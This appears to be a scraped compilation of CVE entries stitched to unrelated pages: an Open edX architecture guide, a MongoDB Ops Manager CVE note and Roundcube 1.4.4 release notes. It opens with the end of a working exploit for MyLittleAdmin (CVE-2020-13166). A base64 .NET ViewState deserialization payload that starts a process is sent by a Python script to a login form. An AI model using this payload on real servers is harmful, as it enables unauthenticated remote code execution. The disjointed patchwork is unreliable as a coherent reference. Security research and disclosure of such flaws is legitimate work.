ZTIKTWVtYmVyVHlwZRBHZW5lcmljQXJndW1lbnRzAQEBAQEAAwgNU3lzdGVtLlR5cGVbXQkPAAAACQ0AAAAJDgAAAAYUAAAAPlN5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzIFN0YXJ0KFN5c3RlbS5TdHJpbmcsIFN5c3RlbS5TdHJpbmcpBhUAAAA+U3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MgU3RhcnQoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykIAAAACgEKAAAACQAAAAYWAAAAB0NvbXBhcmUJDAAAAAYYAAAADVN5c3RlbS5TdHJpbmcGGQAAACtJbnQzMiBDb21wYXJlKFN5c3RlbS5TdHJpbmcsIFN5c3RlbS5TdHJpbmcpBhoAAAAyU3lzdGVtLkludDMyIENvbXBhcmUoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykIAAAACgEQAAAACAAAAAYbAAAAcVN5c3RlbS5Db21wYXJpc29uYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCQwAAAAKCQwAAAAJGAAAAAkWAAAACgvRWjvTrAIEiQyXFySADCN2ualb9g=="

payload = {
  '\_\_VIEWSTATE' : shellcode,
  '\_\_VIEWSTATEGENERATOR' : \_\_VIEWSTATEGENERATOR,
  '\_\_EVENTVALIDATION' : \_\_EVENTVALIDATION,
  'fServerName$cControl' : ServerName,
  'txtDatabase' : '',
  'listAuthentication' : 'sql',
  'txtLogin' : '',
  'txtPassword' : '',
  'listProtocol' : '',
  'txtPacketSize' : '4096',
  'txtConnectionTimeOut' : '15', 
  'txtExecutionTimeOut' : '0',
  'btnConnect': 'Connect'
}

headers = {
  'Content-Type': 'application/x-www-form-urlencoded',
  'Cookie': 'Skin=default; CultureName=en-US',
  'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9',
  'Origin': 'http://10.0.0.38',
  'Referer': 'http://10.0.0.38/',
  'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36',
}

print("Sending shellcode request to server")
r = requests.post("http://10.0.0.38", data=payload, headers=headers)

if "An error occured." in r.text:
  print("Check Task Manager for win32calc.exe")
else:
  print("Failed to launch shellcode: {}".format(r.text))

CVE-2020-13166: SSD Advisory - MyLittleAdmin PreAuth RCE - SSD Secure Disclosure

Studio in Open edX Ironwood 2.5, when CodeJail is not used, allows a user to go to the "Create New course>New section>New subsection>New unit>Add new component>Problem button>Advanced tab>Custom Python evaluated code" screen, edit the problem, and execute Python code. This leads to arbitrary code execution.

Open edX Developer's Guide

The Open edX project is a web-based platform for creating, delivering, and analyzing online courses. It is the software that powers edx.org and many other online education sites.

This page explains the architecture of the platform at a high level, without getting into too many details.

**2.1. Overview¶**

There are a handful of major components in the Open edX project. Where possible, these communicate using stable, documented APIs.

The centerpiece of the Open edX architecture is edx-platform, which contains the learning management and course authoring applications (LMS and Studio, respectively).

This service is supported by a collection of other autonomous web services called independently deployed applications (IDAs). Over time, edX plans to break out more of the existing edx-platform functions into new IDAs. This strategy will help manage the complexity of the edx-platform code base to make it as easy as possible for developers to approach and contribute to the project.

![A diagram of the components and technologies that make up an edX site.](https://edx.readthedocs.io/projects/edx-developer-guide/en/latest/_images/edx-architecture.png)

Almost all of the server-side code in the Open edX project is in Python, with Django as the web application framework.

**2.2. Key Components¶**

**2.2.1. Learning Management System (LMS)¶**

The LMS is the most visible part of the Open edX project. Learners take courses using the LMS. The LMS also provides an instructor dashboard that users who have the Admin or Staff role can access by selecting **Instructor**.

The LMS uses a number of data stores. Courses are stored in MongoDB, with videos served from YouTube or Amazon S3. Per-learner data is stored in MySQL.

As learners move through courses and interact with them, events are published to the analytics pipeline for collection, analysis, and reporting.

**2.2.1.1. Front End¶**

The Django server-side code in the LMS and elsewhere uses Mako for front-end template generation. The browser-side code is written primarily in JavaScript with some CoffeeScript as well (edX is working to replace that code with JavaScript). Parts of the client-side code use the Backbone.js framework, and edX is moving more of the code base to use that framework. The Open edX project uses Sass and the Bourbon framework for CSS code.

**2.2.1.2. Course Browsing¶**

The Open edX project provides a simple front page for browsing courses. The edx.org site has a separate home page and course discovery site that is not open source.

**2.2.1.3. Course Structure¶**

Open edX courses are composed of units called XBlocks. Anyone can write new XBlocks, allowing educators and technologists to extend the set of components for their courses. The edX platform also still contains several XModules, the precursors to XBlocks. EdX is working to rewrite the existing XModules as XBlocks and remove XModules from our code base.

In addition to XBlocks, there are a few ways to extend course behavior:

*   The LMS is an LTI tool consumer. Course authors can embed LTI tools to integrate other learning tools into an Open edX course.
    
*   Problems can use embedded Python code to either present the problem or assess the learner’s response. Instructor-written Python code is executed in a secure environment called CodeJail.
    
*   JavaScript components can be integrated using JS Input.
    
*   Courses can be exported and imported using OLX (open learning XML), an XML- based format for courses.
    

**2.2.2. Studio¶**

Studio is the course authoring environment. Course teams use it to create and update courses. Studio writes its courses to the same Mongo database that the LMS uses.

**2.2.3. Discussions¶**

Course discussions are managed by an IDA called comments (also called forums). comments is one of the few non-Python components, written in Ruby using the Sinatra framework. The LMS uses an API provided by the comments service to integrate discussions into the learners’ course experience.

The comments service includes a notifier process that sends learners notifications about updates in topics of interest.

**2.2.4. Mobile Apps¶**

The Open edX project includes a mobile application, available for iOS and Android, that allows learners to watch course videos and more. EdX is actively enhancing the mobile app.

**2.2.5. Analytics¶**

Events describing learner behavior are captured by the Open edX analytics pipeline. The events are stored as JSON in S3, processed using Hadoop, and then digested, aggregated results are published to MySQL. Results are made available via a REST API to Insights, an IDA that instructors and administrators use to explore data that lets them know what their learners are doing and how their courses are being used.

![A diagram of the components and technologies that make up the Open edX analytics architecture.](https://edx.readthedocs.io/projects/edx-developer-guide/en/latest/_images/edx-architecture-analytics.png)

**2.2.6. Background Work¶**

A number of tasks are large enough that they are performed by separate background workers, rather than in the web applications themselves. This work is queued and distributed using Celery and RabbitMQ. Examples of queued work include:

*   Grading entire courses
    
*   Sending bulk emails (with Amazon SES)
    
*   Generating answer distribution reports
    
*   Producing end-of-course certificates
    

The Open edX project includes an IDA called XQueue that can run custom graders. These are separate processes that run compute-intensive assessments of learners’ work.

**2.2.7. Search¶**

The Open edX project uses Elasticsearch for searching in multiple contexts, including course search and the comments service.

**2.2.8. Other Components¶**

In addition to the components detailed above, the Open edX project also has services for other capabilities, such as one that manages e-commerce functions like order work flows and coupons.

CVE-2020-13144: 2. Open edX Architecture — Open edX Developer's Guide documentation

In affected Ops Manager versions there is an exposed http route was that may allow attackers to view a specific access log of a publicly exposed Ops Manager instance. This issue affects: MongoDB Inc. MongoDB Ops Manager 4.0 versions 4.0.9, 4.0.10 and MongoDB Ops Manager 4.1 version 4.1.5.



CVE-2019-2388: Ops Manager Server Changelog — MongoDB Ops Manager 6.0

An issue was discovered in Roundcube Webmail before 1.4.4. There is a cross-site scripting (XSS) vulnerability in rcube_washtml.php because JavaScript code can occur in the CDATA of an HTML message.

This is a service and security update to the stable version 1.4 of Roundcube Webmail.  
It contains four fixes for recently reported security vulnerabilities as well a number  
of general improvements from our issue tracker. See the full changelog below.

**Security fixes**

*   Cross-Site Scripting (XSS) via malicious HTML content
*   CSRF attack can cause an authenticated user to be logged out
*   Remote code execution via crafted config options
*   Path traversal vulnerability allowing local file inclusion via crafted 'plugins' option

The latter two vulnerabilities are classified minor because they only affect Roundcube installations  
with public access to the Roundcube installer. That's generally a high-risk situation and is expected  
to be rare or practically non-existent in productive Roundcube deployments. However, the fixes are done  
in core in order to also prevent from future and yet unknown attack vectors.

This version is considered stable and we recommend to update all productive installations  
of Roundcube with it. Please do backup your data before updating!

**CHANGELOG**

*   Fix bug where attachments with Content-Id were attached to the message on reply (#7122)
*   Fix identity selection on reply when both sender and recipient addresses are included in identities (#7211)
*   Elastic: Fix text selection with Shift+PageUp and Shift+PageDown in plain text editor when using Chrome (#7230)
*   Elastic: Fix recipient input bug when using click to select a contact from autocomplete list (#7231)
*   Elastic: Fix color of a folder with recent messages (#7281)
*   Elastic: Restrict logo size in print view (#7275)
*   Fix invalid Content-Type for messages with only html part and inline images - Mail\_Mime-1.10.7 (#7261)
*   Fix missing contact display name in QR Code data (#7257)
*   Fix so button label in Select image/media dialogs is "Close" not "Cancel" (#7246)
*   Fix regression in testing database schema on MSSQL (#7227)
*   Fix cursor position after inserting a group to a recipient input using autocompletion (#7267)
*   Fix string literals handling in IMAP STATUS (and various other) responses (#7290)
*   Fix bug where multiple images in a message were replaced by the first one on forward/reply/edit (#7293)
*   Fix handling keyservers configured with protocol prefix (#7295)
*   Markasjunk: Fix marking as spam/ham on moving messages with Move menu (#7189)
*   Markasjunk: Fix bug where moving to Junk was failing on messages selected with Select > All (#7206)
*   Fix so imap error message is displayed to the user on folder create/update (#7245)
*   Fix bug where a special folder couldn't be created if a special-use flag is not supported (#7147)
*   Mailvelope: Fix bug where recipients with name were not handled properly in mail compose (#7312)
*   Fix characters encoding in group rename input after group creation/rename (#7330)
*   Fix bug where some message/rfc822 parts could not be attached on forward (#7323)
*   Make install-jsdeps.sh script working without the file program installed (#7325)
*   Fix performance issue of parsing big HTML messages by disabling HTML5 parser for these (#7331)
*   Fix so Print button for PDF attachments works on Firefox >= 75 (#5125)
*   Security: Fix XSS issue in handling of CDATA in HTML messages
*   Security: Fix remote code execution via crafted 'im\_convert\_path' or 'im\_identify\_path' settings
*   Security: Fix local file inclusion (and code execution) via crafted 'plugins' option
*   Security: Fix CSRF bypass that could be used to log out an authenticated user (#7302)

Tag

#sql